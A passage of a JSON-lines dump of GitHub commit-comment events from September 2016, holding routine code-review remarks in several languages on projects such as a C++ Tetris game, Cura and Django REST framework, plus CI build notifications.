hours so the subset is smaller with this condition... But the current code does not provide accurate information."}},"created_at":"2016-09-07T13:48:56Z"}
{"id":"4527745482","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928576,"position":20,"line":21,"path":"sdlAdventures/Game.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:49:51Z","updated_at":"2016-09-07T13:49:51Z","body":"Donde se liberan los gameObjects que atachas acá?"}},"created_at":"2016-09-07T13:49:51Z"}
{"id":"4527746734","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928579,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:50:05Z","updated_at":"2016-09-07T13:50:05Z","body":"https://i.imgur.com/5TuM3No.png\r\n\r\n^ If you take a look at the default Icon I can at least assume why they layer three icons.\r\n\r\nThe Signal indicator is the same for Wifi as well as 3g, then the 3g Tower for 3g and finally the connection type (H in this case)\r\n\r\nHowever this is indeed something that unnecessarily overcomplicates stuff."}},"created_at":"2016-09-07T13:50:05Z"}
{"id":"4527746810","type":"CommitCommentEvent","actor":{"login":"56k-amaury"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928580,"position":null,"line":null,"path":null,"commit_id":"ece304984046d159dc6a6970ae4f3d7a03be70da","created_at":"2016-09-07T13:50:06Z","updated_at":"2016-09-07T13:50:06Z","body":"My bad, I was not looking at the same REQ "}},"created_at":"2016-09-07T13:50:06Z"}
{"id":"4527751181","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928597,"position":31,"line":30,"path":"sdlAdventures/Game.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:50:52Z","updated_at":"2016-09-07T13:50:52Z","body":"chequear contra nullptr"}},"created_at":"2016-09-07T13:50:52Z"}
{"id":"4527752396","type":"CommitCommentEvent","actor":{"login":"jarekwg"},"repo":{"name":"django-json-api/django-rest-framework-json-api"},"payload":{"comment":{"id":18928607,"position":91,"line":213,"path":"rest_framework_json_api/renderers.py","commit_id":"0aedffb88fc7009f95e8ca35ec65a4e594d6c685","created_at":"2016-09-07T13:51:03Z","updated_at":"2016-09-07T13:51:03Z","body":"@scottfisk Yep looks like that's the issue, but in the earlier section, not this line. At least for my case."}},"created_at":"2016-09-07T13:51:03Z"}
{"id":"4527752497","type":"CommitCommentEvent","actor":{"login":"bitkevin"},"repo":{"name":"btccom/btcpool"},"payload":{"comment":{"id":18928609,"position":null,"line":null,"path":null,"commit_id":"ce1648ddb09afdee0de94f1367265ff5a9b2705a","created_at":"2016-09-07T13:51:04Z","updated_at":"2016-09-07T13:51:04Z","body":"Support Namecoin merged mining now!"}},"created_at":"2016-09-07T13:51:04Z"}
{"id":"4527752871","type":"CommitCommentEvent","actor":{"login":"lukaszunity"},"repo":{"name":"Unity-Technologies/mono"},"payload":{"comment":{"id":18928612,"position":null,"line":null,"path":null,"commit_id":"402310c0c97f31ada040b1161e4e36c943a71818","created_at":"2016-09-07T13:51:09Z","updated_at":"2016-09-07T13:51:09Z","body":"Nice job fixing this Josh! 👍 "}},"created_at":"2016-09-07T13:51:09Z"}
{"id":"4527753166","type":"CommitCommentEvent","actor":{"login":"flockspace"},"repo":{"name":"flockspace/webGUI"},"payload":{"comment":{"id":18928614,"position":null,"line":null,"path":null,"commit_id":"3f966fa59d03900c9c59972f7df5ac64db8a505f","created_at":"2016-09-07T13:51:12Z","updated_at":"2016-09-07T13:51:12Z","body":"configDB is a python-wrapper written to work with cassandra DB."}},"created_at":"2016-09-07T13:51:12Z"}
{"id":"4527753207","type":"CommitCommentEvent","actor":{"login":"jarekwg"},"repo":{"name":"django-json-api/django-rest-framework-json-api"},"payload":{"comment":{"id":18928615,"position":63,"line":186,"path":"rest_framework_json_api/renderers.py","commit_id":"0aedffb88fc7009f95e8ca35ec65a4e594d6c685","created_at":"2016-09-07T13:51:12Z","updated_at":"2016-09-07T13:51:12Z","body":"@scottfisk Here. "}},"created_at":"2016-09-07T13:51:12Z"}
{"id":"4527754741","type":"CommitCommentEvent","actor":{"login":"cpainchaud"},"repo":{"name":"cpainchaud/pan-configurator"},"payload":{"comment":{"id":18928621,"position":null,"line":null,"path":null,"commit_id":"af7543e489cf039a7c9820ad7a77bf4603ffa78a","created_at":"2016-09-07T13:51:27Z","updated_at":"2016-09-07T13:51:27Z","body":"Hi @swaschkut ,\r\n\r\n Can you tell if you added this line because # was creating errors ?"}},"created_at":"2016-09-07T13:51:27Z"}
{"id":"4527755387","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928623,"position":33,"line":32,"path":"sdlAdventures/Game.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:51:34Z","updated_at":"2016-09-07T13:51:34Z","body":"Donde liberás el s_pIntance?"}},"created_at":"2016-09-07T13:51:34Z"}
{"id":"4527761092","type":"CommitCommentEvent","actor":{"login":"leggetter"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18928643,"position":7,"line":47,"path":"package.json","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-07T13:52:31Z","updated_at":"2016-09-07T13:52:31Z","body":"Maybe we could remove `uuid` as a dependency though... Will see."}},"created_at":"2016-09-07T13:52:31Z"}
{"id":"4527761995","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18928644,"position":null,"line":null,"path":null,"commit_id":"25f056ca24db7958f218337b373d61a81189367c","created_at":"2016-09-07T13:52:39Z","updated_at":"2016-09-07T13:52:39Z","body":"Comment to get sample request from GitHub."}},"created_at":"2016-09-07T13:52:39Z"}
{"id":"4527762595","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18928649,"position":8,"line":32,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-07T13:52:45Z","updated_at":"2016-09-07T13:52:45Z","body":"It does give `zipfile.BadZipFile` error if the zip archive is corrupt. Just tried it. We probably want to catch `BadZipFile` and `LargeZipFile` errors here instead of `Exception`."}},"created_at":"2016-09-07T13:52:45Z"}
{"id":"4527762917","type":"CommitCommentEvent","actor":{"login":"ignaciogc"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928650,"position":null,"line":null,"path":null,"commit_id":"ece304984046d159dc6a6970ae4f3d7a03be70da","created_at":"2016-09-07T13:52:48Z","updated_at":"2016-09-07T13:52:48Z","body":"I knew we were not talking about the same thing :)"}},"created_at":"2016-09-07T13:52:48Z"}
{"id":"4527764082","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"ropenscilabs/monkeylearn"},"payload":{"comment":{"id":18928655,"position":5,"line":18,"path":"appveyor.yml","commit_id":"342332ba3ca0124b21e245447ddf447d3b87917f","created_at":"2016-09-07T13:53:00Z","updated_at":"2016-09-07T13:53:00Z","body":"This didn't seem to work. Let's stick with `R_QPDF`."}},"created_at":"2016-09-07T13:53:00Z"}
{"id":"4527770631","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"openmrs/openmrs-module-legacyui"},"payload":{"comment":{"id":18928673,"position":4,"line":3,"path":"omod/src/main/webapp/errorhandler.jsp","commit_id":"46f6f4789dfddea3866ca4f0bbd47cae9ab5afaf","created_at":"2016-09-07T13:54:02Z","updated_at":"2016-09-07T13:54:02Z","body":"Technically this shouldn't be the correct uri see my comment on the ticket"}},"created_at":"2016-09-07T13:54:02Z"}
{"id":"4527771249","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18928675,"position":362,"line":362,"path":"js2.md","commit_id":"dc2e6cdb9e99bfe17200bb7a6014bc611afe7a3d","created_at":"2016-09-07T13:54:10Z","updated_at":"2016-09-07T13:54:10Z","body":"这个其实是用来改变上下文环境，有些东西你都答对了一部分，需要你在实践中慢慢了解"}},"created_at":"2016-09-07T13:54:10Z"}
{"id":"4527773263","type":"CommitCommentEvent","actor":{"login":"antespi"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":18928683,"position":5,"line":49,"path":"mail_tracking/models/mail_message.py","commit_id":"07a28ceee46c73cf33d0895cd3bb20d7514f7a1b","created_at":"2016-09-07T13:54:28Z","updated_at":"2016-09-07T13:54:28Z","body":"There should be only one tracking per mail.message and partner"}},"created_at":"2016-09-07T13:54:28Z"}
{"id":"4527774481","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"LostTeam/lostteam.github.io"},"payload":{"comment":{"id":18928686,"position":null,"line":null,"path":null,"commit_id":"f0c0751411d73d8b872174fbf68cee3805d2a9bb","created_at":"2016-09-07T13:54:40Z","updated_at":"2016-09-07T13:54:40Z","body":"forces everyone to access site securely"}},"created_at":"2016-09-07T13:54:40Z"}
{"id":"4527775307","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18928692,"position":7,"line":14,"path":"application/src/main/java/org/exoplatform/chat/portlet/chat/assets/base.less","commit_id":"56ef2e62d64c9b3990cc86200c2ead8c2f02dc0f","created_at":"2016-09-07T13:54:48Z","updated_at":"2016-09-07T13:54:48Z","body":"Using a fixed width does not seem to be the best option. The width should adapt to the text IMO. Texts lengths can be very different from one language to another."}},"created_at":"2016-09-07T13:54:48Z"}
{"id":"4527778671","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18928699,"position":null,"line":null,"path":null,"commit_id":"ff31a1f63bf7b1e0ac3e0c6cdb0e4eb68c3a6916","created_at":"2016-09-07T13:55:20Z","updated_at":"2016-09-07T13:55:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 961](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12896&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T13:55:20Z"}
{"id":"4527779710","type":"CommitCommentEvent","actor":{"login":"puzrin"},"repo":{"name":"sidorares/node-mysql2"},"payload":{"comment":{"id":18928701,"position":null,"line":null,"path":null,"commit_id":"58d906854c8787de8bcbdf5c6774d31c058ff1d6","created_at":"2016-09-07T13:55:29Z","updated_at":"2016-09-07T13:55:29Z","body":"may be non-utf**8** ? Typo?"}},"created_at":"2016-09-07T13:55:29Z"}
{"id":"4527780493","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"AOSEP/manifest"},"payload":{"comment":{"id":18928704,"position":null,"line":null,"path":null,"commit_id":"b2fabdfc4f790ca6acecc023021cf11166d7a5fb","created_at":"2016-09-07T13:55:36Z","updated_at":"2016-09-07T13:55:36Z","body":"@aapav01  can u come to hangouts for some important discussion"}},"created_at":"2016-09-07T13:55:36Z"}
{"id":"4527781123","type":"CommitCommentEvent","actor":{"login":"joshpeterson"},"repo":{"name":"Unity-Technologies/mono"},"payload":{"comment":{"id":18928707,"position":null,"line":null,"path":null,"commit_id":"402310c0c97f31ada040b1161e4e36c943a71818","created_at":"2016-09-07T13:55:42Z","updated_at":"2016-09-07T13:55:42Z","body":"Thank @joncham as well, we worked on it together."}},"created_at":"2016-09-07T13:55:42Z"}
{"id":"4527781834","type":"CommitCommentEvent","actor":{"login":"ignaciogc"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928709,"position":null,"line":null,"path":null,"commit_id":"40f339f358c4d533429d106449b87211db5d79ae","created_at":"2016-09-07T13:55:49Z","updated_at":"2016-09-07T13:55:49Z","body":"Quick question, doesn't this \"ADD\" 15 minutes for timezones WEST of GMT?\r\n\r\nFor +2, this works because the query is doing `NOW() - 2 HOUR 15 MINUTES`\r\nHowever, for -4, which I am, this is doing `NOW() + 4 HOUR 15 MINUTES` = Added 15 extra minutes to the disappear_time, instead of removing.\r\n\r\nI can't pull and test right now, but looking at the code, this is what it seems this is doing. That is why my pull request from the other day removed the 900 seconds AFTER the result is processed.\r\n\r\nThanks."}},"created_at":"2016-09-07T13:55:49Z"}
{"id":"4527786928","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928720,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:56:34Z","updated_at":"2016-09-07T13:56:34Z","body":"Ok but that's oxygen, right? In `ubuntu-mono-dark` the same bug should be present, because overlaying `nm-signal` and `gsm-3g` results in the same error. Just trying to figure out where to report that..."}},"created_at":"2016-09-07T13:56:34Z"}
{"id":"4527790269","type":"CommitCommentEvent","actor":{"login":"King-ler"},"repo":{"name":"omkarmoghe/Pokemap"},"payload":{"comment":{"id":18928724,"position":85,"line":85,"path":"app/src/main/res/values-nl/pokemon.xml","commit_id":"624165a5652d8ebe754dcaac16b5fb5750e5a7f2","created_at":"2016-09-07T13:57:05Z","updated_at":"2016-09-07T13:57:05Z","body":"Needs to be Farfectch'd."}},"created_at":"2016-09-07T13:57:05Z"}
{"id":"4527794584","type":"CommitCommentEvent","actor":{"login":"vavrecan"},"repo":{"name":"touchdesign/prestashop-sofortbanking"},"payload":{"comment":{"id":18928731,"position":8,"line":80,"path":"validation.php","commit_id":"47888f4fc7d21a01cdca041ccee00333dcea2d9c","created_at":"2016-09-07T13:57:46Z","updated_at":"2016-09-07T13:57:46Z","body":"ahhh sure, got it :) thanks "}},"created_at":"2016-09-07T13:57:46Z"}
{"id":"4527795159","type":"CommitCommentEvent","actor":{"login":"Orbiter"},"repo":{"name":"yacy/yacy_webclient_bootstrap"},"payload":{"comment":{"id":18928732,"position":null,"line":null,"path":null,"commit_id":"37bd722c9414e2d06500d36c9e8072e10cd56df5","created_at":"2016-09-07T13:57:51Z","updated_at":"2016-09-07T13:57:51Z","body":"just wanted to show that this is possible, so people can clone it for that purpose"}},"created_at":"2016-09-07T13:57:51Z"}
{"id":"4527796414","type":"CommitCommentEvent","actor":{"login":"Obihoernchen"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928734,"position":null,"line":null,"path":null,"commit_id":"9c86985aa02b07411251471d577345d0c3d365d4","created_at":"2016-09-07T13:58:03Z","updated_at":"2016-09-07T13:58:03Z","body":"it was fine sorry ;)"}},"created_at":"2016-09-07T13:58:03Z"}
{"id":"4527796762","type":"CommitCommentEvent","actor":{"login":"nmicht"},"repo":{"name":"Maar01/Taller_programacion_sistemas"},"payload":{"comment":{"id":18928735,"position":2,"line":2,"path":"src/Constantes.java","commit_id":"293a6e2c1d22e543236ef3192706ed69e17d719a","created_at":"2016-09-07T13:58:08Z","updated_at":"2016-09-07T13:58:08Z","body":"Utiliza documentación estilo API"}},"created_at":"2016-09-07T13:58:08Z"}
{"id":"4527797975","type":"CommitCommentEvent","actor":{"login":"gdikov"},"repo":{"name":"gdikov/StereoVision_HBPPlatform"},"payload":{"comment":{"id":18928743,"position":null,"line":null,"path":null,"commit_id":"d2516b0ae8d2a826310a602463a597b4e1e90bf3","created_at":"2016-09-07T13:58:20Z","updated_at":"2016-09-07T13:58:20Z","body":"I think that this is unnecessary because the with statement in Python automatically invokes the file.close() method upon completion. Nevertheless that was my first thought too when I saw the error in the HBP platform. We can try it with the save_file=False argument and see if the problem is indeed in the file writing or folder creation."}},"created_at":"2016-09-07T13:58:20Z"}
{"id":"4527801704","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"w3c/i18n-drafts"},"payload":{"comment":{"id":18928752,"position":null,"line":null,"path":null,"commit_id":"a3341cb022a745029de6aef49c4f36fca5c88273","created_at":"2016-09-07T13:58:53Z","updated_at":"2016-09-07T13:58:53Z","body":"i fixed the swedish link typo in the next commit"}},"created_at":"2016-09-07T13:58:53Z"}
{"id":"4527801802","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928753,"position":2,"line":4,"path":"sdlAdventures/Main.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:58:54Z","updated_at":"2016-09-07T13:58:54Z","body":"nullptr\r\n"}},"created_at":"2016-09-07T13:58:54Z"}
{"id":"4527802910","type":"CommitCommentEvent","actor":{"login":"nmicht"},"repo":{"name":"Maar01/Taller_programacion_sistemas"},"payload":{"comment":{"id":18928758,"position":2,"line":2,"path":"src/Linea.java","commit_id":"293a6e2c1d22e543236ef3192706ed69e17d719a","created_at":"2016-09-07T13:59:06Z","updated_at":"2016-09-07T13:59:06Z","body":"Utiliza documentación estilo API, tanto para tu clase como para tus métodos"}},"created_at":"2016-09-07T13:59:06Z"}
{"id":"4527803657","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928760,"position":2,"line":4,"path":"sdlAdventures/Main.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:59:14Z","updated_at":"2016-09-07T13:59:14Z","body":"donde se libera g_game?"}},"created_at":"2016-09-07T13:59:14Z"}
{"id":"4527804858","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18928763,"position":null,"line":null,"path":null,"commit_id":"3a3ecc40d50b90a2a4dfe5a44f418d16ea942a50","created_at":"2016-09-07T13:59:24Z","updated_at":"2016-09-07T13:59:24Z","body":"is there a specific issue that was tracking this one down? I'm just trying to figure out what it fixes. is that fixing potential \"white screen\" bugs?"}},"created_at":"2016-09-07T13:59:24Z"}
{"id":"4527807364","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18928766,"position":42,"line":56,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"86369ce1da14b91deb28ddc32d8cbdc1aab28b96","created_at":"2016-09-07T13:59:47Z","updated_at":"2016-09-07T13:59:47Z","body":"Code style: Use double quotes for strings. Fixed this for you in b7c2a77277bba3f9b3c88461445cea7f074bd878."}},"created_at":"2016-09-07T13:59:47Z"}
{"id":"4527807930","type":"CommitCommentEvent","actor":{"login":"SurDuet"},"repo":{"name":"SurDuet/qrcodejs"},"payload":{"comment":{"id":18928767,"position":20,"line":23,"path":"index.html","commit_id":"b1e5fbabb06be6ae584b2a3704eae20501f66c0d","created_at":"2016-09-07T13:59:52Z","updated_at":"2016-09-07T13:59:52Z","body":"loop when input nothing in web browser"}},"created_at":"2016-09-07T13:59:52Z"}
{"id":"4527812213","type":"CommitCommentEvent","actor":{"login":"nmicht"},"repo":{"name":"Maar01/Taller_programacion_sistemas"},"payload":{"comment":{"id":18928779,"position":6,"line":23,"path":"src/Linea.java","commit_id":"2b29622461f62d6d83e5349919bc8bed708eb530","created_at":"2016-09-07T14:00:34Z","updated_at":"2016-09-07T14:00:34Z","body":"Falta indicar el tipo http://www.oracle.com/technetwork/java/javase/documentation/index-137868.html#tag"}},"created_at":"2016-09-07T14:00:34Z"}
{"id":"4527814691","type":"CommitCommentEvent","actor":{"login":"gdikov"},"repo":{"name":"gdikov/StereoVision_HBPPlatform"},"payload":{"comment":{"id":18928784,"position":null,"line":null,"path":null,"commit_id":"d2516b0ae8d2a826310a602463a597b4e1e90bf3","created_at":"2016-09-07T14:00:57Z","updated_at":"2016-09-07T14:00:57Z","body":"Oh, I think I found it. Very embarrassing mistake to comment the Simulation.end() line in the Main..."}},"created_at":"2016-09-07T14:00:57Z"}
{"id":"4527819764","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928813,"position":41,"line":28,"path":"sdlAdventures/Tetrimino.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T14:01:46Z","updated_at":"2016-09-07T14:01:46Z","body":"Si Tetrimino hereda publicamente de SDLGameObject, no deberías hacer esto."}},"created_at":"2016-09-07T14:01:46Z"}
{"id":"4527821891","type":"CommitCommentEvent","actor":{"login":"DoDoENT"},"repo":{"name":"psiha/build"},"payload":{"comment":{"id":18928821,"position":null,"line":null,"path":null,"commit_id":"ae0466d6f032ad07bf080e9744c4b589bb0587d5","created_at":"2016-09-07T14:02:08Z","updated_at":"2016-09-07T14:02:08Z","body":"Another point of view would be that experimental and untested compiler flags should not go into the public build system - those should be enabled locally by those who have compatible compiler."}},"created_at":"2016-09-07T14:02:08Z"}
{"id":"4527823307","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18928823,"position":null,"line":null,"path":null,"commit_id":"ff31a1f63bf7b1e0ac3e0c6cdb0e4eb68c3a6916","created_at":"2016-09-07T14:02:21Z","updated_at":"2016-09-07T14:02:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 961](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12896&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:07:01"}},"created_at":"2016-09-07T14:02:21Z"}
{"id":"4527823499","type":"CommitCommentEvent","actor":{"login":"elijahandrews"},"repo":{"name":"DataDog/dd-agent"},"payload":{"comment":{"id":18928825,"position":2,"line":1,"path":"dogstatsd.py","commit_id":"b5853e1b88de4ba38e0fd319de56a5463d89fbba","created_at":"2016-09-07T14:02:23Z","updated_at":"2016-09-07T14:02:23Z","body":"Typo?"}},"created_at":"2016-09-07T14:02:23Z"}
{"id":"4527829423","type":"CommitCommentEvent","actor":{"login":"DoDoENT"},"repo":{"name":"psiha/build"},"payload":{"comment":{"id":18928836,"position":5,"line":37,"path":"toolchains/msvc.toolchain.cmake","commit_id":"ae0466d6f032ad07bf080e9744c4b589bb0587d5","created_at":"2016-09-07T14:03:23Z","updated_at":"2016-09-07T14:03:23Z","body":"How to undo add_compile_options in local build? There is no remove_compile_options command...\r\n\r\nGenerally, I think that experimental and untested compiler flags should not go into the public build system - those should be enabled locally by those who have compatible compiler."}},"created_at":"2016-09-07T14:03:23Z"}
{"id":"4527833932","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18928852,"position":16,"line":93,"path":"store/volume_driver/btrfs.go","commit_id":"4fbd6587f6306401c6b8ec6862c4e6873448a300","created_at":"2016-09-07T14:04:06Z","updated_at":"2016-09-07T14:04:06Z","body":"seems like this block could become a helper function..."}},"created_at":"2016-09-07T14:04:06Z"}
{"id":"4527834011","type":"CommitCommentEvent","actor":{"login":"jason-neal"},"repo":{"name":"jason-neal/Spectrum"},"payload":{"comment":{"id":18928853,"position":null,"line":null,"path":null,"commit_id":"404df06628ae9606bf6b597184528fe403cb15bc","created_at":"2016-09-07T14:04:08Z","updated_at":"2016-09-07T14:04:08Z","body":"No special reason. In the past I know I have specified the pixel \nposition with range(1024) but I should just change that habit to \nnp.arrange(1024).\n\nIts not something used specifically for testing, but it could be tested. \nAt this stage I will turn them all to arrays.\n\n\nOn 09/07/2016 02:27 PM, Daniel Thaagaard Andreasen wrote:\n>\n> Good question, I don't know. Is there a special reason why you don't \n> use arrays? For all practical purposes the data will be loaded with \n> |np.loadtxt|, |pd.read_csv|, |fits.getdata|, etc. and you will have it \n> as an |np.array| at your fingertips. I have never specified a \n> wavelength vector by hand.\n> I guess this is for testing?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/jason-neal/Spectrum/commit/404df06628ae9606bf6b597184528fe403cb15bc#commitcomment-18928199>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AJnCz2XPsjvekRAD2dA-SsQs_ZOuTe4Iks5qnrupgaJpZM4J22VA>.\n>\n\n-- \n____________________________________________________________________\n  Jason J. Neal                           Jason.Neal@astro.up.pt\n  PhD Student\n  DEPARTAMENTO DE FISICA E ASTRONOMIA     CENTRO DE ASTROFISICA\n  Faculdade de Ciencias da U.Porto        Universidade do Porto\n  Rua do Campo Alegre 687                 Rua das Estrelas\n  P-4169-007 Porto, Portugal              P-4150-762 Porto, Portugal\n  www.up.pt    www.fc.up.pt               www.iastro.pt\n\n"}},"created_at":"2016-09-07T14:04:08Z"}
{"id":"4527838580","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928871,"position":41,"line":28,"path":"sdlAdventures/Tetrimino.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T14:04:55Z","updated_at":"2016-09-07T14:04:55Z","body":"Tetrimino hereda de SDLGameObject, y este de Game Object. Como la herencia es publica, no deberías hacer esto."}},"created_at":"2016-09-07T14:04:55Z"}
{"id":"4527841599","type":"CommitCommentEvent","actor":{"login":"sandikbarr"},"repo":{"name":"PRX/publish.prx.org"},"payload":{"comment":{"id":18928877,"position":5,"line":6,"path":"env-example","commit_id":"7ca590f623266a6de294c714aafcffe0116ea9ee","created_at":"2016-09-07T14:05:27Z","updated_at":"2016-09-07T14:05:27Z","body":"I used CMS_HOST=https://cms-staging.prx.tech"}},"created_at":"2016-09-07T14:05:27Z"}
{"id":"4527842271","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18928880,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T14:05:34Z","updated_at":"2016-09-07T14:05:34Z","body":"I'd say 3), remove the log and the ifdef. you may call it useless code, I call it architecture."}},"created_at":"2016-09-07T14:05:34Z"}
{"id":"4527846499","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":18928891,"position":5,"line":49,"path":"mail_tracking/models/mail_message.py","commit_id":"07a28ceee46c73cf33d0895cd3bb20d7514f7a1b","created_at":"2016-09-07T14:06:17Z","updated_at":"2016-09-07T14:06:17Z","body":"But why is there two then?"}},"created_at":"2016-09-07T14:06:17Z"}
{"id":"4527846952","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18928894,"position":null,"line":null,"path":null,"commit_id":"42d09d445585e5e635f5b533848ca18ae64d8375","created_at":"2016-09-07T14:06:23Z","updated_at":"2016-09-07T14:06:23Z","body":"* `drax` and `grootfs` were checked in :( - we need a `.gitignore`\r\n* do we have integration tests for metrics? How comes we didn't catch this before pushing? I would assume it would fail compilation."}},"created_at":"2016-09-07T14:06:23Z"}
{"id":"4527848298","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928896,"position":85,"line":85,"path":"sdlAdventures/Vector2D.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T14:06:37Z","updated_at":"2016-09-07T14:06:37Z","body":"usar float::epsilon en lugar de 0"}},"created_at":"2016-09-07T14:06:37Z"}
{"id":"4527849670","type":"CommitCommentEvent","actor":{"login":"MateoConLechuga"},"repo":{"name":"CE-Programming/toolchain"},"payload":{"comment":{"id":18928902,"position":241,"line":1887,"path":"CEdev/lib/src/libraries/graphics_src/graphx/v2/graphics_lib.asm","commit_id":"7d3e9d7969b130e24a4706e8791fa5e7ac669428","created_at":"2016-09-07T14:06:51Z","updated_at":"2016-09-07T14:06:51Z","body":"Oops, those were some testing things...."}},"created_at":"2016-09-07T14:06:51Z"}
{"id":"4527851359","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18928905,"position":null,"line":null,"path":null,"commit_id":"90824fd02e62bbaac0b2d4e1cd05a4100a1fb843","created_at":"2016-09-07T14:07:08Z","updated_at":"2016-09-07T14:07:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 962](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12899&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T14:07:08Z"}
{"id":"4527853856","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18928910,"position":44,"line":162,"path":"store/volume_driver/btrfs.go","commit_id":"7a944282f0df0832bbe8f40bb1b1e3053a30e2b4","created_at":"2016-09-07T14:07:33Z","updated_at":"2016-09-07T14:07:33Z","body":"???"}},"created_at":"2016-09-07T14:07:33Z"}
{"id":"4527855820","type":"CommitCommentEvent","actor":{"login":"nmicht"},"repo":{"name":"Maar01/Taller_programacion_sistemas"},"payload":{"comment":{"id":18928914,"position":37,"line":35,"path":"src/Codop.java","commit_id":"9133ec43d13d6ac83b073e86adaaec9501c85226","created_at":"2016-09-07T14:07:53Z","updated_at":"2016-09-07T14:07:53Z","body":"Estandarizar nombres de métodos, o camel case o snake case, veo que tienes mezclas en distintos lugares. Misma situación para variables"}},"created_at":"2016-09-07T14:07:53Z"}
